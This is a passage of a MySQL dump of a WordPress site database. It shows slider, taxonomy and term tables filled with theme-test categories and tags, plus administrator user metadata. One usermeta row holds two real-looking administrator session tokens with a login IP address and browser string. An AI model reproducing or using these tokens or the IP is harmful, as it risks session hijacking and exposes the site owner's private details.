) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpii_revslider_navigations_bkp`
--

LOCK TABLES `wpii_revslider_navigations_bkp` WRITE;
/*!40000 ALTER TABLE `wpii_revslider_navigations_bkp` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpii_revslider_navigations_bkp` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpii_revslider_sliders`
--

DROP TABLE IF EXISTS `wpii_revslider_sliders`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpii_revslider_sliders` (
  `id` int(9) NOT NULL AUTO_INCREMENT,
  `title` tinytext COLLATE utf8mb4_unicode_ci NOT NULL,
  `alias` tinytext COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `params` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `settings` text COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `type` varchar(191) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpii_revslider_sliders`
--

LOCK TABLES `wpii_revslider_sliders` WRITE;
/*!40000 ALTER TABLE `wpii_revslider_sliders` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpii_revslider_sliders` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpii_revslider_sliders_bkp`
--

DROP TABLE IF EXISTS `wpii_revslider_sliders_bkp`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpii_revslider_sliders_bkp` (
  `id` int(9) NOT NULL AUTO_INCREMENT,
  `title` tinytext COLLATE utf8mb4_unicode_ci NOT NULL,
  `alias` tinytext COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `params` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `settings` text COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `type` varchar(191) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpii_revslider_sliders_bkp`
--

LOCK TABLES `wpii_revslider_sliders_bkp` WRITE;
/*!40000 ALTER TABLE `wpii_revslider_sliders_bkp` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpii_revslider_sliders_bkp` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpii_revslider_slides`
--

DROP TABLE IF EXISTS `wpii_revslider_slides`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpii_revslider_slides` (
  `id` int(9) NOT NULL AUTO_INCREMENT,
  `slider_id` int(9) NOT NULL,
  `slide_order` int(11) NOT NULL,
  `params` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `layers` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `settings` text COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpii_revslider_slides`
--

LOCK TABLES `wpii_revslider_slides` WRITE;
/*!40000 ALTER TABLE `wpii_revslider_slides` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpii_revslider_slides` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpii_revslider_slides_bkp`
--

DROP TABLE IF EXISTS `wpii_revslider_slides_bkp`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpii_revslider_slides_bkp` (
  `id` int(9) NOT NULL AUTO_INCREMENT,
  `slider_id` int(9) NOT NULL,
  `slide_order` int(11) NOT NULL,
  `params` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `layers` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `settings` text COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpii_revslider_slides_bkp`
--

LOCK TABLES `wpii_revslider_slides_bkp` WRITE;
/*!40000 ALTER TABLE `wpii_revslider_slides_bkp` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpii_revslider_slides_bkp` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpii_revslider_static_slides`
--

DROP TABLE IF EXISTS `wpii_revslider_static_slides`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpii_revslider_static_slides` (
  `id` int(9) NOT NULL AUTO_INCREMENT,
  `slider_id` int(9) NOT NULL,
  `params` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `layers` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `settings` text COLLATE utf8mb4_unicode_ci NOT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpii_revslider_static_slides`
--

LOCK TABLES `wpii_revslider_static_slides` WRITE;
/*!40000 ALTER TABLE `wpii_revslider_static_slides` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpii_revslider_static_slides` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpii_revslider_static_slides_bkp`
--

DROP TABLE IF EXISTS `wpii_revslider_static_slides_bkp`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpii_revslider_static_slides_bkp` (
  `id` int(9) NOT NULL AUTO_INCREMENT,
  `slider_id` int(9) NOT NULL,
  `params` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `layers` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `settings` text COLLATE utf8mb4_unicode_ci NOT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpii_revslider_static_slides_bkp`
--

LOCK TABLES `wpii_revslider_static_slides_bkp` WRITE;
/*!40000 ALTER TABLE `wpii_revslider_static_slides_bkp` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpii_revslider_static_slides_bkp` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpii_term_relationships`
--

DROP TABLE IF EXISTS `wpii_term_relationships`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpii_term_relationships` (
  `object_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `term_taxonomy_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `term_order` int(11) NOT NULL DEFAULT 0,
  PRIMARY KEY (`object_id`,`term_taxonomy_id`),
  KEY `term_taxonomy_id` (`term_taxonomy_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpii_term_relationships`
--

LOCK TABLES `wpii_term_relationships` WRITE;
/*!40000 ALTER TABLE `wpii_term_relationships` DISABLE KEYS */;
INSERT INTO `wpii_term_relationships` VALUES (1,1,0),(22,2,0),(23,2,0),(25,2,0),(26,3,0),(27,3,0),(28,3,0),(29,3,0),(30,4,0),(31,4,0),(32,4,0),(33,4,0),(34,4,0),(1714,190,0),(1715,190,0),(1716,190,0),(1717,190,0),(1718,190,0),(1719,190,0),(1720,190,0),(1721,190,0),(1722,190,0),(1723,190,0),(1827,191,0),(1835,190,0),(1883,191,0),(1884,191,0),(1885,191,0),(1886,191,0),(1887,191,0),(1888,190,0),(1889,190,0),(1891,190,0),(1892,190,0),(1893,190,0),(1894,190,0),(1895,190,0),(1896,190,0),(1897,190,0),(1898,190,0),(271,1,0),(271,192,0),(274,193,0),(815,42,0),(844,18,0),(844,42,0),(265,42,0),(274,78,0),(274,91,0),(274,114,0),(274,121,0),(274,135,0),(274,140,0),(274,182,0),(274,184,0),(274,187,0),(274,18,0),(274,42,0),(274,56,0),(1040,190,0),(1041,190,0),(1042,190,0),(1043,190,0),(1044,190,0),(1045,190,0),(1046,190,0),(2007,1,0),(1047,190,0),(1048,190,0),(1049,190,0),(1050,191,0),(1051,190,0),(1052,191,0),(1053,191,0),(1054,191,0),(1055,191,0),(1056,191,0),(2008,190,0),(2086,2,0),(2063,2,0),(2061,2,0),(2099,2,0);
/*!40000 ALTER TABLE `wpii_term_relationships` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpii_term_taxonomy`
--

DROP TABLE IF EXISTS `wpii_term_taxonomy`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpii_term_taxonomy` (
  `term_taxonomy_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `taxonomy` varchar(32) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `description` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `count` bigint(20) NOT NULL DEFAULT 0,
  PRIMARY KEY (`term_taxonomy_id`),
  UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`),
  KEY `taxonomy` (`taxonomy`)
) ENGINE=MyISAM AUTO_INCREMENT=194 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpii_term_taxonomy`
--

LOCK TABLES `wpii_term_taxonomy` WRITE;
/*!40000 ALTER TABLE `wpii_term_taxonomy` DISABLE KEYS */;
INSERT INTO `wpii_term_taxonomy` VALUES (1,1,'category','',0,3),(2,2,'nav_menu','',0,7),(3,3,'nav_menu','',0,4),(4,4,'nav_menu','',0,5),(5,5,'category','',0,0),(6,6,'category','',0,0),(7,7,'category','',0,0),(8,8,'category','',0,0),(9,9,'category','',0,0),(10,10,'category','',0,0),(11,11,'category','',0,0),(12,12,'category','',0,0),(13,13,'category','',0,0),(14,14,'category','',0,0),(15,15,'category','',0,0),(16,16,'category','',0,0),(17,17,'category','',0,0),(18,18,'category','',0,2),(19,19,'category','',0,0),(20,20,'category','',0,0),(21,21,'category','',0,0),(22,22,'category','',0,0),(23,23,'category','Posts that have edge-case related tests',0,0),(24,24,'category','',0,0),(25,25,'category','',0,0),(26,26,'category','',0,0),(27,27,'category','',0,0),(28,28,'category','',0,0),(29,29,'category','',0,0),(30,30,'category','',0,0),(31,31,'category','',0,0),(32,32,'category','',0,0),(33,33,'category','Posts in this category test markup tags and styles.',0,0),(34,34,'category','Posts that have media-related tests',0,0),(35,35,'category','',0,0),(36,36,'category','',0,0),(37,37,'category','',0,0),(38,38,'category','',0,0),(39,39,'category','',0,0),(40,40,'category','This is a parent category. It will contain child categories',0,0),(41,41,'category','',0,0),(42,42,'category','',0,4),(43,43,'category','Posts in this category test post formats.',0,0),(44,44,'category','',0,0),(45,45,'category','',0,0),(46,46,'category','',0,0),(47,47,'category','',0,0),(48,48,'category','',0,0),(49,49,'category','',0,0),(50,50,'category','',0,0),(51,51,'category','',5,0),(52,52,'category','',0,0),(53,53,'category','',0,0),(54,54,'category','Posts with template-related tests',0,0),(55,55,'category','Posts in this category test unpublished posts.',0,0),(56,56,'category','',0,1),(57,57,'category','',0,0),(58,58,'category','',0,0),(59,59,'category','',0,0),(60,60,'category','',0,0),(61,61,'category','',0,0),(62,62,'category','',0,0),(63,63,'category','',0,0),(64,64,'category','',39,0),(65,65,'category','',64,0),(66,66,'category','This is a description for the Child Category 01.',40,0),(67,67,'category','This is a description for the Child Category 02.',40,0),(68,68,'category','This is a description for the Child Category 03.',40,0),(69,69,'category','This is a description for the Child Category 04.',40,0),(70,70,'category','This is a description for the Child Category 05.',40,0),(71,71,'category','',28,0),(72,72,'category','This is a description for the Grandchild Category.',68,0),(73,73,'post_tag','Tags posts about 8BIT.',0,0),(74,74,'post_tag','',0,0),(75,75,'post_tag','Tags posts about Articles.',0,0),(76,76,'post_tag','',0,0),(77,77,'post_tag','',0,0),(78,78,'post_tag','',0,1),(79,79,'post_tag','',0,0),(80,80,'post_tag','',0,0),(81,81,'post_tag','',0,0),(82,82,'post_tag','',0,0),(83,83,'post_tag','',0,0),(84,84,'post_tag','',0,0),(85,85,'post_tag','',0,0),(86,86,'post_tag','',0,0),(87,87,'post_tag','',0,0),(88,88,'post_tag','',0,0),(89,89,'post_tag','',0,0),(90,90,'post_tag','',0,0),(91,91,'post_tag','',0,1),(92,92,'post_tag','',0,0),(93,93,'post_tag','',0,0),(94,94,'post_tag','Tags posts about #dowork.',0,0),(95,95,'post_tag','',0,0),(96,96,'post_tag','',0,0),(97,97,'post_tag','',0,0),(98,98,'post_tag','',0,0),(99,99,'post_tag','',0,0),(100,100,'post_tag','',0,0),(101,101,'post_tag','Tags posts about fail.',0,0),(102,102,'post_tag','',0,0),(103,103,'post_tag','',0,0),(104,104,'post_tag','',0,0),(105,105,'post_tag','',0,0),(106,106,'post_tag','',0,0),(107,107,'post_tag','Tags posts about fun.',0,0),(108,108,'post_tag','',0,0),(109,109,'post_tag','',0,0),(110,110,'post_tag','',0,0),(111,111,'post_tag','',0,0),(112,112,'post_tag','',0,0),(113,113,'post_tag','',0,0),(114,114,'post_tag','',0,1),(115,115,'post_tag','',0,0),(116,116,'post_tag','',0,0),(117,117,'post_tag','',0,0),(118,118,'post_tag','',0,0),(119,119,'post_tag','',0,0),(120,120,'post_tag','',0,0),(121,121,'post_tag','',0,1),(122,122,'post_tag','',0,0),(123,123,'post_tag','',0,0),(124,124,'post_tag','',0,0),(125,125,'post_tag','Tags posts about love.',0,0),(126,126,'post_tag','',0,0),(127,127,'post_tag','',0,0),(128,128,'post_tag','',0,0),(129,129,'post_tag','',0,0),(130,130,'post_tag','',0,0),(131,131,'post_tag','',0,0),(132,132,'post_tag','Tags posts about motherships.',0,0),(133,133,'post_tag','Tags posts about articles you must read.',0,0),(134,134,'post_tag','Tags posts about that nailed it.',0,0),(135,135,'post_tag','',0,1),(136,136,'post_tag','',0,0),(137,137,'post_tag','',0,0),(138,138,'post_tag','',0,0),(139,139,'post_tag','',0,0),(140,140,'post_tag','',0,1),(141,141,'post_tag','',0,0),(142,142,'post_tag','',0,0),(143,143,'post_tag','',0,0),(144,144,'post_tag','',0,0),(145,145,'post_tag','',0,0),(146,146,'post_tag','',0,0),(147,147,'post_tag','',0,0),(148,148,'post_tag','',0,0),(149,149,'post_tag','',0,0),(150,150,'post_tag','',0,0),(151,151,'post_tag','',0,0),(152,152,'post_tag','',0,0),(153,153,'post_tag','',0,0),(154,154,'post_tag','',0,0),(155,155,'post_tag','',0,0),(156,156,'post_tag','',0,0),(157,157,'post_tag','',0,0),(158,158,'post_tag','',0,0),(159,159,'post_tag','',0,0),(160,160,'post_tag','',0,0),(161,161,'post_tag','',0,0),(162,162,'post_tag','',0,0),(163,163,'post_tag','Tags posts about success.',0,0),(164,164,'post_tag','Tags posts about swagger.',0,0),(165,165,'post_tag','',0,0),(166,166,'post_tag','',0,0),(167,167,'post_tag','',0,0),(168,168,'post_tag','',0,0),(169,169,'post_tag','',0,0),(170,170,'post_tag','',0,0),(171,171,'post_tag','Tags posts about tags. #inception',0,0),(172,172,'post_tag','',0,0),(173,173,'post_tag','',0,0),(174,174,'post_tag','',0,0),(175,175,'post_tag','',0,0),(176,176,'post_tag','',0,0),(177,177,'post_tag','',0,0),(178,178,'post_tag','',0,0),(179,179,'post_tag','',0,0),(180,180,'post_tag','',0,0),(181,181,'post_tag','Tags posts about things that cannot be unseen.',0,0),(182,182,'post_tag','',0,1),(183,183,'post_tag','',0,0),(184,184,'post_tag','',0,1),(185,185,'post_tag','',0,0),(186,186,'post_tag','Tags posts about WordPress.',0,0),(187,187,'post_tag','',0,1),(188,188,'post_tag','',0,0),(189,189,'post_tag','',0,0),(190,190,'nav_menu','',0,33),(191,191,'nav_menu','',0,12),(192,192,'post_format','',0,1),(193,193,'post_format','',0,1);
/*!40000 ALTER TABLE `wpii_term_taxonomy` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpii_termmeta`
--

DROP TABLE IF EXISTS `wpii_termmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpii_termmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `term_id` (`term_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpii_termmeta`
--

LOCK TABLES `wpii_termmeta` WRITE;
/*!40000 ALTER TABLE `wpii_termmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpii_termmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpii_terms`
--

DROP TABLE IF EXISTS `wpii_terms`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpii_terms` (
  `term_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `slug` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `term_group` bigint(10) NOT NULL DEFAULT 0,
  PRIMARY KEY (`term_id`),
  KEY `slug` (`slug`(191)),
  KEY `name` (`name`(191))
) ENGINE=MyISAM AUTO_INCREMENT=194 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpii_terms`
--

LOCK TABLES `wpii_terms` WRITE;
/*!40000 ALTER TABLE `wpii_terms` DISABLE KEYS */;
INSERT INTO `wpii_terms` VALUES (1,'Uncategorized','uncategorized',0),(2,'Primary','primary',0),(3,'Primary (2)','primary-2',0),(4,'Social Links Menu','social-links-menu',0),(5,'aciform','aciform',0),(6,'antiquarianism','antiquarianism',0),(7,'arrangement','arrangement',0),(8,'asmodeus','asmodeus',0),(9,'Blogroll','blogroll',0),(10,'broder','broder',0),(11,'buying','buying',0),(12,'Cat A','cat-a',0),(13,'Cat B','cat-b',0),(14,'Cat C','cat-c',0),(15,'championship','championship',0),(16,'chastening','chastening',0),(17,'clerkship','clerkship',0),(18,'Design','design',0),(19,'disinclination','disinclination',0),(20,'disinfection','disinfection',0),(21,'dispatch','dispatch',0),(22,'echappee','echappee',0),(23,'Edge Case','edge-case-2',0),(24,'enphagy','enphagy',0),(25,'equipollent','equipollent',0),(26,'fatuity','fatuity',0),(27,'Foo A','foo-a',0),(28,'Foo Parent','foo-parent',0),(29,'gaberlunzie','gaberlunzie',0),(30,'illtempered','illtempered',0),(31,'insubordination','insubordination',0),(32,'lender','lender',0),(33,'Markup','markup',0),(34,'Media','media-2',0),(35,'monosyllable','monosyllable',0),(36,'packthread','packthread',0),(37,'palter','palter',0),(38,'papilionaceous','papilionaceous',0),(39,'Parent','parent',0),(40,'Parent Category','parent-category',0),(41,'personable','personable',0),(42,'Photography','photography',0),(43,'Post Formats','post-formats',0),(44,'propylaeum','propylaeum',0),(45,'pustule','pustule',0),(46,'quartern','quartern',0),(47,'scholarship','scholarship',0),(48,'selfconvicted','selfconvicted',0),(49,'showshoe','showshoe',0),(50,'sloyd','sloyd',0),(51,'sub','sub',0),(52,'sublunary','sublunary',0),(53,'tamtam','tamtam',0),(54,'Template','template-2',0),(55,'Unpublished','unpublished',0),(56,'Video','video-2',0),(57,'weakhearted','weakhearted',0),(58,'ween','ween',0),(59,'wellhead','wellhead',0),(60,'wellintentioned','wellintentioned',0),(61,'whetstone','whetstone',0),(62,'WordPress','wordpress',0),(63,'years','years',0),(64,'Child 1','child-1',0),(65,'Child 2','child-2',0),(66,'Child Category 01','child-category-01',0),(67,'Child Category 02','child-category-02',0),(68,'Child Category 03','child-category-03',0),(69,'Child Category 04','child-category-04',0),(70,'Child Category 05','child-category-05',0),(71,'Foo A','foo-a-foo-parent',0),(72,'Grandchild Category','grandchild-category',0),(73,'8BIT','8bit',0),(74,'alignment','alignment-2',0),(75,'Articles','articles',0),(76,'aside','aside',0),(77,'audio','audio',0),(78,'Branding','branding',0),(79,'captions','captions-2',0),(80,'categories','categories',0),(81,'chat','chat',0),(82,'chattels','chattels',0),(83,'cienaga','cienaga',0),(84,'claycold','claycold',0),(85,'Codex','codex',0),(86,'comments','comments-2',0),(87,'content','content-2',0),(88,'crushing','crushing',0),(89,'css','css',0),(90,'depo','depo',0),(91,'Design','design',0),(92,'dinarchy','dinarchy',0),(93,'doolie','doolie',0),(94,'dowork','dowork',0),(95,'edge case','edge-case',0),(96,'embeds','embeds-2',0),(97,'energumen','energumen',0),(98,'ephialtes','ephialtes',0),(99,'eudiometer','eudiometer',0),(100,'excerpt','excerpt-2',0),(101,'Fail','fail',0),(102,'featured image','featured-image',0),(103,'figuriste','figuriste',0),(104,'filler','filler',0),(105,'formatting','formatting-2',0),(106,'FTW','ftw',0),(107,'Fun','fun',0),(108,'gallery','gallery',0),(109,'goes here','goes-here',0),(110,'habergeon','habergeon',0),(111,'hapless','hapless',0),(112,'hartshorn','hartshorn',0),(113,'hostility impregnability','hostility-impregnability',0),(114,'html','html',0),(115,'image','image',0),(116,'impropriation','impropriation',0),(117,'is','is',0),(118,'jetpack','jetpack-2',0),(119,'knave','knave',0),(120,'layout','layout',0),(121,'Life Style','life-style',0),(122,'link','link',0),(123,'lists','lists-2',0),(124,'lorem','lorem',0),(125,'Love','love',0),(126,'markup','markup-2',0),(127,'media','media',0),(128,'misinformed','misinformed',0),(129,'moil','moil',0),(130,'more','more',0),(131,'mornful','mornful',0),(132,'Mothership','mothership',0),(133,'Must Read','mustread',0),(134,'Nailed It','nailedit',0),(135,'Northern','northern',0),(136,'outlaw','outlaw',0),(137,'pagination','pagination',0),(138,'pamphjlet','pamphjlet',0),(139,'password','password-2',0),(140,'Photography','photography',0),(141,'Pictures','pictures',0),(142,'pingbacks','pingbacks-2',0),(143,'pneumatics','pneumatics',0),(144,'portly portreeve','portly-portreeve',0),(145,'post','post',0),(146,'Post Formats','post-formats',0),(147,'precipitancy','precipitancy',0),(148,'privation','privation',0),(149,'programme','programme',0),(150,'psychological','psychological',0),(151,'puncher','puncher',0),(152,'quote','quote',0),(153,'ramose','ramose',0),(154,'read more','read-more',0),(155,'readability','readability',0),(156,'renegade','renegade',0),(157,'retrocede','retrocede',0),(158,'shortcode','shortcode',0),(159,'stagnation unhorsed','stagnation-unhorsed',0),(160,'standard','standard-2',0),(161,'status','status',0),(162,'sticky','sticky-2',0),(163,'Success','success',0),(164,'Swagger','swagger',0),(165,'Tag A','tag-a',0),(166,'Tag B','tag-b',0),(167,'Tag C','tag-c',0),(168,'tag1','tag1',0),(169,'tag2','tag2',0),(170,'tag3','tag3',0),(171,'Tags','tags',0),(172,'template','template',0),(173,'text','text',0),(174,'the man','the-man',0),(175,'thunderheaded','thunderheaded',0),(176,'tiled','tiled',0),(177,'title','title',0),(178,'trackbacks','trackbacks-2',0),(179,'twitter','twitter-2',0),(180,'unculpable','unculpable',0),(181,'Unseen','unseen',0),(182,'video','video',0),(183,'videopress','videopress',0),(184,'Web Design','web-design',0),(185,'withered brandnew','withered-brandnew',0),(186,'WordPress','wordpress',0),(187,'Wordpress','wordpress-2',0),(188,'wordpress.tv','wordpress-tv',0),(189,'xanthopsia','xanthopsia',0),(190,'Main','main',0),(191,'Home8','home8',0),(192,'Video','post-format-video',0),(193,'Gallery','post-format-gallery',0);
/*!40000 ALTER TABLE `wpii_terms` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpii_usermeta`
--

DROP TABLE IF EXISTS `wpii_usermeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpii_usermeta` (
  `umeta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  PRIMARY KEY (`umeta_id`),
  KEY `user_id` (`user_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM AUTO_INCREMENT=30 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpii_usermeta`
--

LOCK TABLES `wpii_usermeta` WRITE;
/*!40000 ALTER TABLE `wpii_usermeta` DISABLE KEYS */;
INSERT INTO `wpii_usermeta` VALUES (1,1,'nickname','xxx9admin'),(2,1,'first_name',''),(3,1,'last_name',''),(4,1,'description',''),(5,1,'rich_editing','true'),(6,1,'syntax_highlighting','true'),(7,1,'comment_shortcuts','false'),(8,1,'admin_color','fresh'),(9,1,'use_ssl','0'),(10,1,'show_admin_bar_front','true'),(11,1,'locale',''),(12,1,'wpii_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(13,1,'wpii_user_level','10'),(14,1,'dismissed_wp_pointers','vc_pointers_backend_editor'),(15,1,'show_welcome_panel','0'),(16,1,'session_tokens','a:2:{s:64:\"51960f19dde5c53af59a31fd6007cea9dbe949bfc9fa8017f70e50e0b394c39b\";a:4:{s:10:\"expiration\";i:1613397019;s:2:\"ip\";s:13:\"99.232.92.134\";s:2:\"ua\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36\";s:5:\"login\";i:1612187419;}s:64:\"10c93caae98d6eee8b82b22df3b4ba439b7b952ca3d5f3770d54121918438743\";a:4:{s:10:\"expiration\";i:1613397026;s:2:\"ip\";s:13:\"99.232.92.134\";s:2:\"ua\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36\";s:5:\"login\";i:1612187426;}}'),(17,1,'bglibDashboardOrder','1'),(18,1,'jetpack_tracks_anon_id','jetpack:S5BW8LvQRiyhULmCCgVk23Gs'),(19,1,'wpii_dashboard_quick_press_last_post_id','2156'),(20,1,'community-events-location','a:1:{s:2:\"ip\";s:11:\"99.232.92.0\";}'),(21,1,'boldgrid_dismissed_admin_notices','a:2:{s:2:\"id\";s:13:\"bg-key-prompt\";s:9:\"timestamp\";i:1603887797;}'),(22,1,'wpii_user-settings','libraryContent=browse'),(23,1,'wpii_user-settings-time','1603889323'),(24,1,'tgmpa_dismissed_notice_tgmpa','1'),(28,1,'closedpostboxes_dashboard','a:7:{i:0;s:27:\"wpforms_reports_widget_lite\";i:1;s:21:\"dashboard_site_health\";i:2;s:19:\"dashboard_right_now\";i:3;s:18:\"dashboard_activity\";i:4;s:17:\"wp301promo_widget\";i:5;s:21:\"dashboard_quick_press\";i:6;s:17:\"dashboard_primary\";}'),(29,1,'metaboxhidden_dashboard','a:0:{}'),(25,1,'nav_menu_recently_edited','2'),(26,1,'managenav-menuscolumnshidden','a:3:{i:0;s:15:\"title-attribute\";i:1;s:3:\"xfn\";i:2;s:11:\"description\";}'),(27,1,'metaboxhidden_nav-menus','a:8:{i:0;s:24:\"add-post-type-templatera\";i:1;s:23:\"add-post-type-portfolio\";i:2;s:22:\"add-post-type-services\";i:3;s:18:\"add-post-type-team\";i:4;s:26:\"add-post-type-testimonials\";i:5;s:12:\"add-post_tag\";i:6;s:15:\"add-post_format\";i:7;s:16:\"add-project-type\";}');
/*!40000 ALTER TABLE `wpii_usermeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpii_users`
--

DROP TABLE IF EXISTS `wpii_users`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpii_users` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_login` varchar(60) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_pass` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_nicename` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_email` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
